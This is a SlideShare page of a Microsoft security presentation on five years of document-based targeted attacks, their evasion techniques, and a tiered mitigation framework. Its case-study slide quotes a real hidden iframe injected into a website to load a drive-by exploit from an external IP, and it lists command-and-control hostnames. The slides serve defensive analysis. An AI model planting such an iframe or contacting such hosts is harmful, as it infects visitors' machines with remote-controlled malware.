SlideShare une entreprise Scribd logo

Five years of Persistent Threats

Maarten Van Horenbeeck
Maarten Van Horenbeeck

This presentation discusses persistent threats from file format attacks over the past 5 years. It outlines how attacks have grown more complex through improved social engineering, obfuscation, and evasion techniques. The presentation provides a case study of a specific attack and recommends mitigation strategies at basic, enhanced and strong levels to help defend against such threats.

Technologie
1  sur  51
Télécharger pour lire hors ligne
Title of Presentation Maarten Van Horenbeeck Senior Program Manager Five Years of Persistent Threats Microsoft Security Response Center Trustworthy Computing
Agenda
Microsoft Corporation | Trustworthy Computing (TWC) Agenda • Introduction to file format based attacks • Why do these attacks work? • Have they grown more complicated? • How do attackers hide their activities? • What can we do?
Microsoft Corporation | Trustworthy Computing (TWC) Growth of Attacks Total Submissions By Year 2005 Totals 2006 Totals 2007 Totals 2008 Totals 2009 Totals 135% increase250% increase 250% Source: Microsoft Malware Protection Center (MMPC)
Microsoft Corporation | Trustworthy Computing (TWC) Methodology E-mail server Web proxy Compromised machine Control server
Microsoft Corporation | Trustworthy Computing (TWC) Free webmail Compromised machine Control server Methodology
Microsoft Corporation | Trustworthy Computing (TWC) The LureSocial Engineering
Microsoft Corporation | Trustworthy Computing (TWC) Social Engineering
Microsoft Corporation | Trustworthy Computing (TWC) Social Engineering • Clever use of social engineering techniques  Cognitive dissonance  Mimicking writing styles  Matching content to interest  Convincing users to forward messages  Backdooring “memes” and viral content  Creating a trusted resource
Microsoft Corporation | Trustworthy Computing (TWC) The LureThe Attack
Microsoft Corporation | Trustworthy Computing (TWC) How Content-Type Attacks Work Vulnerability Shellcode Shellcode Embedded binary Clean document with same context Malicious document Encrypted stub or packed binary Loaded after successful exploitation
Microsoft Corporation | Trustworthy Computing (TWC) Generations of exploits • Major changes:  Shellcode attempts to evade antivirus and Intrusion Detection  Obfuscation techniques  File types being exploited  The goal and payload of attacks  “Phone home” methods • Quality and reliability of exploits  Depends on the vulnerability being exploited  Did not change drastically
Microsoft Corporation | Trustworthy Computing (TWC) Generations of packing- avoiding detection PE header in plain sight. Simple XOR obfuscation XOR followed by ROL/ROR Custom encoders
Microsoft Corporation | Trustworthy Computing (TWC) Generations of shellcode– avoiding detection • Most static shellcode detectors work by identifying common GetPC patterns
Microsoft Corporation | Trustworthy Computing (TWC) Generations of shellcode- Anti-emulation
Microsoft Corporation | Trustworthy Computing (TWC) Generations of shellcode- API Hooks
Microsoft Corporation | Trustworthy Computing (TWC) The LureThe Trojan
Microsoft Corporation | Trustworthy Computing (TWC) The Trojan
Microsoft Corporation | Trustworthy Computing (TWC) “File Management” “Screen Monitor” “Keyboard Monitor” “Remote Terminal” “System Management” “Video Monitor” “Conversation Management” “Others” “Select All” “Undo Select” The Trojan
Microsoft Corporation | Trustworthy Computing (TWC) Phone Home Methods
Microsoft Corporation | Trustworthy Computing (TWC) DNS Server Victim Responder Phone Home Methods: split horizon
Microsoft Corporation | Trustworthy Computing (TWC) Phone Home Methods
Microsoft Corporation | Trustworthy Computing (TWC)
Microsoft Corporation | Trustworthy Computing (TWC) The LureCase Study
Microsoft Corporation | Trustworthy Computing (TWC) Case Study
Microsoft Corporation | Trustworthy Computing (TWC) Case Study  v_080310.asd Nokia_7650_video_en.doc  Connects to uprise.lamaonl.com  Host name already disabled
Microsoft Corporation | Trustworthy Computing (TWC) Case Study • April 9, 2008 • Drive-by exploit on the web site of a UK organization <iframe src=http://59.120.21.6/img/ft/ex.html width=0 heigh=0></iframe> • This web location • Identifies the user’s web browser • Offers an exploit specifically for that version • Downloads and runs “ipsec.exe” from a server in Taiwan • Connects to control server: freetibet.lamalive.com • This hostname stopped resolving after 48 hours
Microsoft Corporation | Trustworthy Computing (TWC) Case Study • Five months later + 2008-07-12 10:20 | freetibet.lamalife.com | 218.30.103.68 - 2008-08-14 17:46 | freetibet.lamalife.com | 218.30.103.68 + 2008-09-21 04:16 | freetibet.lamalife.com | 69.64.155.78 - 2008-09-25 06:45 | freetibet.lamalife.com | 69.64.155.78 - 2008-09-26 00:37 | freetibet.lamalife.com | 208.73.210.32 + 2008-07-12 09:59 | uprise.lamaonl.com | 218.30.103.68 + 2008-09-21 04:23 | uprise.lamaonl.com | 69.64.155.75 + 2008-09-25 05:08 | uprise.lamaonl.com | 69.64.155.78 31
Microsoft Corporation | Trustworthy Computing (TWC) The LureDefense
Microsoft Corporation | Trustworthy Computing (TWC) Roles and opportunities • Software vendors  Opt-in to operating system mitigations  Have a defined software incident response process  Build security into the development lifecycle • CERTs, WARPs, ISACs • Promote sharing of technical incident information • Define a process that allows learning during response • Enterprise  Network deployment & design  Intelligence-driven Risk Management
Microsoft Corporation | Trustworthy Computing (TWC) What Microsoft is doing • Build secure software  Software Development Lifecycle  Significant investment in mitigation technology • Improve security response  Information sharing programs (MAPP, DISP) • Empower customers  Windows Server: ESC, Core installation  MOICE, Office File Validation  Forensic and mitigation tools
Microsoft Corporation | Trustworthy Computing (TWC) Office • Office 2003 SP3 security push • Office File Validation and Protected View Source: Security Intelligence Report (2009)
Microsoft Corporation | Trustworthy Computing (TWC) Exploit mitigations Visual Studio Windows Internet Explorer Office 2003 2004 2005 2006 2007 2008 2009 2010 2011
Microsoft Corporation | Trustworthy Computing (TWC) EMET: Heap spray pre-allocation 01010101010101010101010101 00101010101010101010101010 10101010101010101010101010 10101010101010101010101010 10101010101010101010101010 10101010101010101010101010 10101010101010101010101010 10101010101010101010101010 10101010101010101010101010 10101010101010101001010110 10101010101010101010101010 10101010101010101010101010 10101010101010101010101010 10101010101010101010101010 01010101010101010101010101 00101010101010101010101010 10101010101010101010101010 10101010101010101010101010 10101010101010101010101010 10101010101010101010101010 10101010101010101010101010 101010101010EMETEMETEMETE METEMETEMETEMETEMET10101 01010101010101010100101011 01010101010101010101010101 01010101010101010101010101 01010101010101010101010101 01010101010101010101010101 0
Forensic tools
MAPP program
Enterprise
Microsoft Corporation | Trustworthy Computing (TWC) Exfiltration Compromise Social Engineering Infiltration Data Access Mitigation framework
Microsoft Corporation | Trustworthy Computing (TWC) Basic: • E-mail security policy • Security awareness training • Filter external e-mails from the organizational domain Enhanced: • Employ Sender-ID or SPF technology • Enhanced awareness training for high value targets • Sharing intelligence on attack patterns Strong: • Digitally sign e-mails • Web site whitelisting Mitigation framework
Microsoft Corporation | Trustworthy Computing (TWC) Basic: • Anti-virus deployed on the gateway • Blocking suspicious attachment types • Spam filtering Enhanced: • Re-scan previously accepted attachments on the mail server Strong: • Dynamic execution and validation of attachments • Web site whitelisting Mitigation framework
Microsoft Corporation | Trustworthy Computing (TWC) Basic: • Anti-virus • Security updates • Reduce user privileges on the system • Disable document macros Enhanced: • Anti-virus with Host Intrusion Prevention • Enable DEP and SEHOP system-wide • Harden applications (e.g. block Javascript execution) • Use MOICE for Office document security • Office File Validation Strong: • Deploy EMET for internet-facing applications • Application whitelisting Mitigation framework
Microsoft Corporation | Trustworthy Computing (TWC) Basic: • Log access to data resources • Deploy split horizon DNS Enhanced: • Audit access to data resources • Deploy Extended Protection for Authentication (EPA) • Correlate data access with network logins Strong: • Multi-factor authentication • Segregation of data stores and untrusted network access Mitigation framework
Microsoft Corporation | Trustworthy Computing (TWC) Basic: • Log access to web sites • Block outbound network access • Use of a content-aware web proxy Enhanced: • Exchange information with CERTs, law enforcement and/or industry partners • DNS monitoring, correlation and log analysis • Black-list access to specific web sites • Deploy DRM and/or data loss prevention tools Strong: • White-list access to specific web sites Mitigation framework
Title of Presentation Maarten Van Horenbeeck maarten.vanhorenbeeck@microsoft.com Featuring work by: Bruce Dang Jonathan Ness Matt Miller Microsoft Security Response Center secure@microsoft.com http://www.microsoft.com/security Microsoft Corporation | Trustworthy Computing (TWC) © 2011 Microsoft Corporation. All rights reserved. Microsoft and Microsoft Office are or may be registered trademarks and/or trademarks in the U.S. and/or other countries. The information herein is for informational purposes only and represents the current view of Microsoft Corporation as of the date of this presentation. Because Microsoft must respond to changing market conditions, it should not be interpreted to be a commitment on the part of Microsoft, and Microsoft cannot guarantee the accuracy of any information provided after the date of this presentation. MICROSOFT MAKES NO WARRANTIES, EXPRESS, IMPLIED OR STATUTORY, AS TO THE INFORMATION IN THIS PRESENTATION. Thank you!

Recommandé

Crouching powerpoint, Hidden Trojan
Crouching powerpoint, Hidden TrojanCrouching powerpoint, Hidden Trojan
Crouching powerpoint, Hidden TrojanMaarten Van Horenbeeck
 
2014: Mid-Year Threat Review
2014: Mid-Year Threat Review2014: Mid-Year Threat Review
2014: Mid-Year Threat ReviewESET
 
BlueHat v17 || All Your Cloud Are Belong to Us; Hunting Compromise in Azure
BlueHat v17 || All Your Cloud Are Belong to Us; Hunting Compromise in Azure BlueHat v17 || All Your Cloud Are Belong to Us; Hunting Compromise in Azure
BlueHat v17 || All Your Cloud Are Belong to Us; Hunting Compromise in Azure BlueHat Security Conference
 
H@dfex 2015 malware analysis
H@dfex 2015 malware analysisH@dfex 2015 malware analysis
H@dfex 2015 malware analysisCharles Lim
 
Issa jason dablow
Issa jason dablowIssa jason dablow
Issa jason dablowISSA LA
 
CheckPoint: Anatomy of an evolving bot
CheckPoint: Anatomy of an evolving botCheckPoint: Anatomy of an evolving bot
CheckPoint: Anatomy of an evolving botGroup of company MUK
 
festival ICT 2013: Gli attacchi mirati e la Difesa Personalizzata Trend Micro
festival ICT 2013: Gli attacchi mirati e la Difesa Personalizzata Trend Microfestival ICT 2013: Gli attacchi mirati e la Difesa Personalizzata Trend Micro
festival ICT 2013: Gli attacchi mirati e la Difesa Personalizzata Trend Microfestival ICT 2016
 
IoT Malware: Comprehensive Survey, Analysis Framework and Case Studies
IoT Malware: Comprehensive Survey, Analysis Framework and Case StudiesIoT Malware: Comprehensive Survey, Analysis Framework and Case Studies
IoT Malware: Comprehensive Survey, Analysis Framework and Case StudiesPriyanka Aash
 

Recommandé

Crouching powerpoint, Hidden Trojan
Crouching powerpoint, Hidden TrojanCrouching powerpoint, Hidden Trojan
Crouching powerpoint, Hidden TrojanMaarten Van Horenbeeck
 
2014: Mid-Year Threat Review
2014: Mid-Year Threat Review2014: Mid-Year Threat Review
2014: Mid-Year Threat ReviewESET
 
BlueHat v17 || All Your Cloud Are Belong to Us; Hunting Compromise in Azure
BlueHat v17 || All Your Cloud Are Belong to Us; Hunting Compromise in Azure BlueHat v17 || All Your Cloud Are Belong to Us; Hunting Compromise in Azure
BlueHat v17 || All Your Cloud Are Belong to Us; Hunting Compromise in Azure BlueHat Security Conference
 
H@dfex 2015 malware analysis
H@dfex 2015 malware analysisH@dfex 2015 malware analysis
H@dfex 2015 malware analysisCharles Lim
 
Issa jason dablow
Issa jason dablowIssa jason dablow
Issa jason dablowISSA LA
 
CheckPoint: Anatomy of an evolving bot
CheckPoint: Anatomy of an evolving botCheckPoint: Anatomy of an evolving bot
CheckPoint: Anatomy of an evolving botGroup of company MUK
 
festival ICT 2013: Gli attacchi mirati e la Difesa Personalizzata Trend Micro
festival ICT 2013: Gli attacchi mirati e la Difesa Personalizzata Trend Microfestival ICT 2013: Gli attacchi mirati e la Difesa Personalizzata Trend Micro
festival ICT 2013: Gli attacchi mirati e la Difesa Personalizzata Trend Microfestival ICT 2016
 
IoT Malware: Comprehensive Survey, Analysis Framework and Case Studies
IoT Malware: Comprehensive Survey, Analysis Framework and Case StudiesIoT Malware: Comprehensive Survey, Analysis Framework and Case Studies
IoT Malware: Comprehensive Survey, Analysis Framework and Case StudiesPriyanka Aash
 
MITRE ATT&CKcon 2018: Playing Devil’s Advocate to Security Initiatives with A...
MITRE ATT&CKcon 2018: Playing Devil’s Advocate to Security Initiatives with A...MITRE ATT&CKcon 2018: Playing Devil’s Advocate to Security Initiatives with A...
MITRE ATT&CKcon 2018: Playing Devil’s Advocate to Security Initiatives with A...MITRE - ATT&CKcon
 
Is Anti-Virus Dead?
Is Anti-Virus Dead?Is Anti-Virus Dead?
Is Anti-Virus Dead?ESET
 
All You Need is One - A ClickOnce Love Story - Secure360 2015
All You Need is One - A ClickOnce Love Story - Secure360 2015All You Need is One - A ClickOnce Love Story - Secure360 2015
All You Need is One - A ClickOnce Love Story - Secure360 2015NetSPI
 
Introduction to DevOps and DevOpsSec with Secure Design by Prof.Krerk (Chulal...
Introduction to DevOps and DevOpsSec with Secure Design by Prof.Krerk (Chulal...Introduction to DevOps and DevOpsSec with Secure Design by Prof.Krerk (Chulal...
Introduction to DevOps and DevOpsSec with Secure Design by Prof.Krerk (Chulal...iotcloudserve_tein
 
An introduction to honeyclient technology
An introduction to honeyclient technologyAn introduction to honeyclient technology
An introduction to honeyclient technologyAngelo Dell'Aera
 
SSL: Past, Present and Future
SSL: Past, Present and FutureSSL: Past, Present and Future
SSL: Past, Present and FutureLuis Grangeia
 
CNIT 121: 4 Getting the Investigation Started on the Right Foot & 5 Initial D...
CNIT 121: 4 Getting the Investigation Started on the Right Foot & 5 Initial D...CNIT 121: 4 Getting the Investigation Started on the Right Foot & 5 Initial D...
CNIT 121: 4 Getting the Investigation Started on the Right Foot & 5 Initial D...Sam Bowne
 
How to measure your security response readiness?
How to measure your security response readiness?How to measure your security response readiness?
How to measure your security response readiness?Tomasz Jakubowski
 
Defcon 22-wesley-mc grew-instrumenting-point-of-sale-malware
Defcon 22-wesley-mc grew-instrumenting-point-of-sale-malwareDefcon 22-wesley-mc grew-instrumenting-point-of-sale-malware
Defcon 22-wesley-mc grew-instrumenting-point-of-sale-malwarePriyanka Aash
 
Top 10 Threats to Cloud Security
Top 10 Threats to Cloud SecurityTop 10 Threats to Cloud Security
Top 10 Threats to Cloud SecuritySBWebinars
 
Addios!
Addios!Addios!
Addios!Chong-Kuan Chen
 
Revealing the Attack Operations Targeting Japan by Shusei Tomonaga & Yuu Nak...
Revealing the Attack Operations Targeting Japan by Shusei Tomonaga & Yuu Nak...Revealing the Attack Operations Targeting Japan by Shusei Tomonaga & Yuu Nak...
Revealing the Attack Operations Targeting Japan by Shusei Tomonaga & Yuu Nak...CODE BLUE
 
Network security, seriously?
Network security, seriously?Network security, seriously?
Network security, seriously?Peter Wood
 
Loggin alerting and hunting technology hub 2016
Loggin alerting and hunting technology hub 2016Loggin alerting and hunting technology hub 2016
Loggin alerting and hunting technology hub 2016Scot Berner
 
The How and Why of Container Vulnerability Management
The How and Why of Container Vulnerability ManagementThe How and Why of Container Vulnerability Management
The How and Why of Container Vulnerability ManagementTim Mackey
 
PANDEMONIUM: Automated Identification of Cryptographic Algorithms using Dynam...
PANDEMONIUM: Automated Identification of Cryptographic Algorithms using Dynam...PANDEMONIUM: Automated Identification of Cryptographic Algorithms using Dynam...
PANDEMONIUM: Automated Identification of Cryptographic Algorithms using Dynam...CODE BLUE
 
How we breach small and medium enterprises (SMEs)
How we breach small and medium enterprises (SMEs)How we breach small and medium enterprises (SMEs)
How we breach small and medium enterprises (SMEs)NCC Group
 
Is talent shortage ws marco morana
Is talent shortage ws marco moranaIs talent shortage ws marco morana
Is talent shortage ws marco moranaMarco Morana
 
Malware collection and analysis
Malware collection and analysisMalware collection and analysis
Malware collection and analysisChong-Kuan Chen
 
Exploiting appliances presentation v1.1-vids-removed
Exploiting appliances presentation v1.1-vids-removedExploiting appliances presentation v1.1-vids-removed
Exploiting appliances presentation v1.1-vids-removedNCC Group
 
System Security on Cloud
System Security on CloudSystem Security on Cloud
System Security on CloudTu Pham
 
Session 1: Windows 8 with Gerry Tessier
Session 1: Windows 8 with Gerry TessierSession 1: Windows 8 with Gerry Tessier
Session 1: Windows 8 with Gerry TessierCTE Solutions Inc.
 

Contenu connexe

Tendances

MITRE ATT&CKcon 2018: Playing Devil’s Advocate to Security Initiatives with A...
MITRE ATT&CKcon 2018: Playing Devil’s Advocate to Security Initiatives with A...MITRE ATT&CKcon 2018: Playing Devil’s Advocate to Security Initiatives with A...
MITRE ATT&CKcon 2018: Playing Devil’s Advocate to Security Initiatives with A...MITRE - ATT&CKcon
 
Is Anti-Virus Dead?
Is Anti-Virus Dead?Is Anti-Virus Dead?
Is Anti-Virus Dead?ESET
 
All You Need is One - A ClickOnce Love Story - Secure360 2015
All You Need is One - A ClickOnce Love Story - Secure360 2015All You Need is One - A ClickOnce Love Story - Secure360 2015
All You Need is One - A ClickOnce Love Story - Secure360 2015NetSPI
 
Introduction to DevOps and DevOpsSec with Secure Design by Prof.Krerk (Chulal...
Introduction to DevOps and DevOpsSec with Secure Design by Prof.Krerk (Chulal...Introduction to DevOps and DevOpsSec with Secure Design by Prof.Krerk (Chulal...
Introduction to DevOps and DevOpsSec with Secure Design by Prof.Krerk (Chulal...iotcloudserve_tein
 
An introduction to honeyclient technology
An introduction to honeyclient technologyAn introduction to honeyclient technology
An introduction to honeyclient technologyAngelo Dell'Aera
 
SSL: Past, Present and Future
SSL: Past, Present and FutureSSL: Past, Present and Future
SSL: Past, Present and FutureLuis Grangeia
 
CNIT 121: 4 Getting the Investigation Started on the Right Foot & 5 Initial D...
CNIT 121: 4 Getting the Investigation Started on the Right Foot & 5 Initial D...CNIT 121: 4 Getting the Investigation Started on the Right Foot & 5 Initial D...
CNIT 121: 4 Getting the Investigation Started on the Right Foot & 5 Initial D...Sam Bowne
 
How to measure your security response readiness?
How to measure your security response readiness?How to measure your security response readiness?
How to measure your security response readiness?Tomasz Jakubowski
 
Defcon 22-wesley-mc grew-instrumenting-point-of-sale-malware
Defcon 22-wesley-mc grew-instrumenting-point-of-sale-malwareDefcon 22-wesley-mc grew-instrumenting-point-of-sale-malware
Defcon 22-wesley-mc grew-instrumenting-point-of-sale-malwarePriyanka Aash
 
Top 10 Threats to Cloud Security
Top 10 Threats to Cloud SecurityTop 10 Threats to Cloud Security
Top 10 Threats to Cloud SecuritySBWebinars
 
Revealing the Attack Operations Targeting Japan by Shusei Tomonaga & Yuu Nak...
Revealing the Attack Operations Targeting Japan by Shusei Tomonaga & Yuu Nak...Revealing the Attack Operations Targeting Japan by Shusei Tomonaga & Yuu Nak...
Revealing the Attack Operations Targeting Japan by Shusei Tomonaga & Yuu Nak...CODE BLUE
 
Network security, seriously?
Network security, seriously?Network security, seriously?
Network security, seriously?Peter Wood
 
Loggin alerting and hunting technology hub 2016
Loggin alerting and hunting technology hub 2016Loggin alerting and hunting technology hub 2016
Loggin alerting and hunting technology hub 2016Scot Berner
 
The How and Why of Container Vulnerability Management
The How and Why of Container Vulnerability ManagementThe How and Why of Container Vulnerability Management
The How and Why of Container Vulnerability ManagementTim Mackey
 
PANDEMONIUM: Automated Identification of Cryptographic Algorithms using Dynam...
PANDEMONIUM: Automated Identification of Cryptographic Algorithms using Dynam...PANDEMONIUM: Automated Identification of Cryptographic Algorithms using Dynam...
PANDEMONIUM: Automated Identification of Cryptographic Algorithms using Dynam...CODE BLUE
 
How we breach small and medium enterprises (SMEs)
How we breach small and medium enterprises (SMEs)How we breach small and medium enterprises (SMEs)
How we breach small and medium enterprises (SMEs)NCC Group
 
Is talent shortage ws marco morana
Is talent shortage ws marco moranaIs talent shortage ws marco morana
Is talent shortage ws marco moranaMarco Morana
 
Malware collection and analysis
Malware collection and analysisMalware collection and analysis
Malware collection and analysisChong-Kuan Chen
 
Exploiting appliances presentation v1.1-vids-removed
Exploiting appliances presentation v1.1-vids-removedExploiting appliances presentation v1.1-vids-removed
Exploiting appliances presentation v1.1-vids-removedNCC Group
 

Tendances (20)

MITRE ATT&CKcon 2018: Playing Devil’s Advocate to Security Initiatives with A...
MITRE ATT&CKcon 2018: Playing Devil’s Advocate to Security Initiatives with A...MITRE ATT&CKcon 2018: Playing Devil’s Advocate to Security Initiatives with A...
MITRE ATT&CKcon 2018: Playing Devil’s Advocate to Security Initiatives with A...
 
Is Anti-Virus Dead?
Is Anti-Virus Dead?Is Anti-Virus Dead?
Is Anti-Virus Dead?
 
All You Need is One - A ClickOnce Love Story - Secure360 2015
All You Need is One - A ClickOnce Love Story - Secure360 2015All You Need is One - A ClickOnce Love Story - Secure360 2015
All You Need is One - A ClickOnce Love Story - Secure360 2015
 
Introduction to DevOps and DevOpsSec with Secure Design by Prof.Krerk (Chulal...
Introduction to DevOps and DevOpsSec with Secure Design by Prof.Krerk (Chulal...Introduction to DevOps and DevOpsSec with Secure Design by Prof.Krerk (Chulal...
Introduction to DevOps and DevOpsSec with Secure Design by Prof.Krerk (Chulal...
 
An introduction to honeyclient technology
An introduction to honeyclient technologyAn introduction to honeyclient technology
An introduction to honeyclient technology
 
SSL: Past, Present and Future
SSL: Past, Present and FutureSSL: Past, Present and Future
SSL: Past, Present and Future
 
CNIT 121: 4 Getting the Investigation Started on the Right Foot & 5 Initial D...
CNIT 121: 4 Getting the Investigation Started on the Right Foot & 5 Initial D...CNIT 121: 4 Getting the Investigation Started on the Right Foot & 5 Initial D...
CNIT 121: 4 Getting the Investigation Started on the Right Foot & 5 Initial D...
 
How to measure your security response readiness?
How to measure your security response readiness?How to measure your security response readiness?
How to measure your security response readiness?
 
Defcon 22-wesley-mc grew-instrumenting-point-of-sale-malware
Defcon 22-wesley-mc grew-instrumenting-point-of-sale-malwareDefcon 22-wesley-mc grew-instrumenting-point-of-sale-malware
Defcon 22-wesley-mc grew-instrumenting-point-of-sale-malware
 
Top 10 Threats to Cloud Security
Top 10 Threats to Cloud SecurityTop 10 Threats to Cloud Security
Top 10 Threats to Cloud Security
 
Addios!
Addios!Addios!
Addios!
 
Revealing the Attack Operations Targeting Japan by Shusei Tomonaga & Yuu Nak...
Revealing the Attack Operations Targeting Japan by Shusei Tomonaga & Yuu Nak...Revealing the Attack Operations Targeting Japan by Shusei Tomonaga & Yuu Nak...
Revealing the Attack Operations Targeting Japan by Shusei Tomonaga & Yuu Nak...
 
Network security, seriously?
Network security, seriously?Network security, seriously?
Network security, seriously?
 
Loggin alerting and hunting technology hub 2016
Loggin alerting and hunting technology hub 2016Loggin alerting and hunting technology hub 2016
Loggin alerting and hunting technology hub 2016
 
The How and Why of Container Vulnerability Management
The How and Why of Container Vulnerability ManagementThe How and Why of Container Vulnerability Management
The How and Why of Container Vulnerability Management
 
PANDEMONIUM: Automated Identification of Cryptographic Algorithms using Dynam...
PANDEMONIUM: Automated Identification of Cryptographic Algorithms using Dynam...PANDEMONIUM: Automated Identification of Cryptographic Algorithms using Dynam...
PANDEMONIUM: Automated Identification of Cryptographic Algorithms using Dynam...
 
How we breach small and medium enterprises (SMEs)
How we breach small and medium enterprises (SMEs)How we breach small and medium enterprises (SMEs)
How we breach small and medium enterprises (SMEs)
 
Is talent shortage ws marco morana
Is talent shortage ws marco moranaIs talent shortage ws marco morana
Is talent shortage ws marco morana
 
Malware collection and analysis
Malware collection and analysisMalware collection and analysis
Malware collection and analysis
 
Exploiting appliances presentation v1.1-vids-removed
Exploiting appliances presentation v1.1-vids-removedExploiting appliances presentation v1.1-vids-removed
Exploiting appliances presentation v1.1-vids-removed
 

Similaire à Five years of Persistent Threats

System Security on Cloud
System Security on CloudSystem Security on Cloud
System Security on CloudTu Pham
 
Session 1: Windows 8 with Gerry Tessier
Session 1: Windows 8 with Gerry TessierSession 1: Windows 8 with Gerry Tessier
Session 1: Windows 8 with Gerry TessierCTE Solutions Inc.
 
Security trend analysis with CVE topic models
Security trend analysis with CVE topic modelsSecurity trend analysis with CVE topic models
Security trend analysis with CVE topic modelsThomas Zimmermann
 
CSS 17: NYC - Realities of Security in the Cloud
CSS 17: NYC - Realities of Security in the CloudCSS 17: NYC - Realities of Security in the Cloud
CSS 17: NYC - Realities of Security in the CloudAlert Logic
 
CSS17: Atlanta - Realities of Security in the Cloud
CSS17: Atlanta - Realities of Security in the CloudCSS17: Atlanta - Realities of Security in the Cloud
CSS17: Atlanta - Realities of Security in the CloudAlert Logic
 
SCS DevSecOps Seminar - State of DevSecOps
SCS DevSecOps Seminar - State of DevSecOpsSCS DevSecOps Seminar - State of DevSecOps
SCS DevSecOps Seminar - State of DevSecOpsStefan Streichsbier
 
Azure 101: Shared responsibility in the Azure Cloud
Azure 101: Shared responsibility in the Azure CloudAzure 101: Shared responsibility in the Azure Cloud
Azure 101: Shared responsibility in the Azure CloudPaulo Renato
 
How to Get Started with DevSecOps
How to Get Started with DevSecOpsHow to Get Started with DevSecOps
How to Get Started with DevSecOpsCYBRIC
 
IT Pros and The Cloud
IT Pros and The CloudIT Pros and The Cloud
IT Pros and The CloudStephen Rose
 
CSS17: Houston - Introduction to Security in the Cloud
CSS17: Houston - Introduction to Security in the CloudCSS17: Houston - Introduction to Security in the Cloud
CSS17: Houston - Introduction to Security in the CloudAlert Logic
 
Protecting Against Web Attacks
Protecting Against Web AttacksProtecting Against Web Attacks
Protecting Against Web AttacksAlert Logic
 
DevSecOps: Taking a DevOps Approach to Security
DevSecOps: Taking a DevOps Approach to SecurityDevSecOps: Taking a DevOps Approach to Security
DevSecOps: Taking a DevOps Approach to SecurityAlert Logic
 
Journey to the Cloud: Securing Your AWS Applications - April 2015
Journey to the Cloud: Securing Your AWS Applications - April 2015Journey to the Cloud: Securing Your AWS Applications - April 2015
Journey to the Cloud: Securing Your AWS Applications - April 2015Alert Logic
 
Secure Application Development in the Age of Continuous Delivery
Secure Application Development in the Age of Continuous DeliverySecure Application Development in the Age of Continuous Delivery
Secure Application Development in the Age of Continuous DeliveryBlack Duck by Synopsys
 
Secure Application Development in the Age of Continuous Delivery
Secure Application Development in the Age of Continuous DeliverySecure Application Development in the Age of Continuous Delivery
Secure Application Development in the Age of Continuous DeliveryTim Mackey
 
Css sf azure_8-9-17-intro to security in the cloud_mark brooks_al
Css sf azure_8-9-17-intro to security in the cloud_mark brooks_alCss sf azure_8-9-17-intro to security in the cloud_mark brooks_al
Css sf azure_8-9-17-intro to security in the cloud_mark brooks_alAlert Logic
 
Security and DevOps: Agility and Teamwork - SID315 - re:Invent 2017
Security and DevOps: Agility and Teamwork - SID315 - re:Invent 2017Security and DevOps: Agility and Teamwork - SID315 - re:Invent 2017
Security and DevOps: Agility and Teamwork - SID315 - re:Invent 2017Amazon Web Services
 
Complete Endpoint protection
Complete Endpoint protectionComplete Endpoint protection
Complete Endpoint protectionxband
 

Similaire à Five years of Persistent Threats (20)

System Security on Cloud
System Security on CloudSystem Security on Cloud
System Security on Cloud
 
Session 1: Windows 8 with Gerry Tessier
Session 1: Windows 8 with Gerry TessierSession 1: Windows 8 with Gerry Tessier
Session 1: Windows 8 with Gerry Tessier
 
Security trend analysis with CVE topic models
Security trend analysis with CVE topic modelsSecurity trend analysis with CVE topic models
Security trend analysis with CVE topic models
 
CSS 17: NYC - Realities of Security in the Cloud
CSS 17: NYC - Realities of Security in the CloudCSS 17: NYC - Realities of Security in the Cloud
CSS 17: NYC - Realities of Security in the Cloud
 
CSS17: Atlanta - Realities of Security in the Cloud
CSS17: Atlanta - Realities of Security in the CloudCSS17: Atlanta - Realities of Security in the Cloud
CSS17: Atlanta - Realities of Security in the Cloud
 
SCS DevSecOps Seminar - State of DevSecOps
SCS DevSecOps Seminar - State of DevSecOpsSCS DevSecOps Seminar - State of DevSecOps
SCS DevSecOps Seminar - State of DevSecOps
 
CSO CXO Series Breakfast
CSO CXO Series BreakfastCSO CXO Series Breakfast
CSO CXO Series Breakfast
 
Azure 101: Shared responsibility in the Azure Cloud
Azure 101: Shared responsibility in the Azure CloudAzure 101: Shared responsibility in the Azure Cloud
Azure 101: Shared responsibility in the Azure Cloud
 
How to Get Started with DevSecOps
How to Get Started with DevSecOpsHow to Get Started with DevSecOps
How to Get Started with DevSecOps
 
IT Pros and The Cloud
IT Pros and The CloudIT Pros and The Cloud
IT Pros and The Cloud
 
CSS17: Houston - Introduction to Security in the Cloud
CSS17: Houston - Introduction to Security in the CloudCSS17: Houston - Introduction to Security in the Cloud
CSS17: Houston - Introduction to Security in the Cloud
 
Protecting Against Web Attacks
Protecting Against Web AttacksProtecting Against Web Attacks
Protecting Against Web Attacks
 
DevSecOps: Taking a DevOps Approach to Security
DevSecOps: Taking a DevOps Approach to SecurityDevSecOps: Taking a DevOps Approach to Security
DevSecOps: Taking a DevOps Approach to Security
 
Journey to the Cloud: Securing Your AWS Applications - April 2015
Journey to the Cloud: Securing Your AWS Applications - April 2015Journey to the Cloud: Securing Your AWS Applications - April 2015
Journey to the Cloud: Securing Your AWS Applications - April 2015
 
Secure the modern Enterprise
Secure the modern EnterpriseSecure the modern Enterprise
Secure the modern Enterprise
 
Secure Application Development in the Age of Continuous Delivery
Secure Application Development in the Age of Continuous DeliverySecure Application Development in the Age of Continuous Delivery
Secure Application Development in the Age of Continuous Delivery
 
Secure Application Development in the Age of Continuous Delivery
Secure Application Development in the Age of Continuous DeliverySecure Application Development in the Age of Continuous Delivery
Secure Application Development in the Age of Continuous Delivery
 
Css sf azure_8-9-17-intro to security in the cloud_mark brooks_al
Css sf azure_8-9-17-intro to security in the cloud_mark brooks_alCss sf azure_8-9-17-intro to security in the cloud_mark brooks_al
Css sf azure_8-9-17-intro to security in the cloud_mark brooks_al
 
Security and DevOps: Agility and Teamwork - SID315 - re:Invent 2017
Security and DevOps: Agility and Teamwork - SID315 - re:Invent 2017Security and DevOps: Agility and Teamwork - SID315 - re:Invent 2017
Security and DevOps: Agility and Teamwork - SID315 - re:Invent 2017
 
Complete Endpoint protection
Complete Endpoint protectionComplete Endpoint protection
Complete Endpoint protection
 

Dernier

Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024The Digital Insurer
 
Connector Corner: Accelerate revenue generation using UiPath API-centric busi...
Connector Corner: Accelerate revenue generation using UiPath API-centric busi...Connector Corner: Accelerate revenue generation using UiPath API-centric busi...
Connector Corner: Accelerate revenue generation using UiPath API-centric busi...DianaGray10
 
Powerful Google developer tools for immediate impact! (2023-24 C)
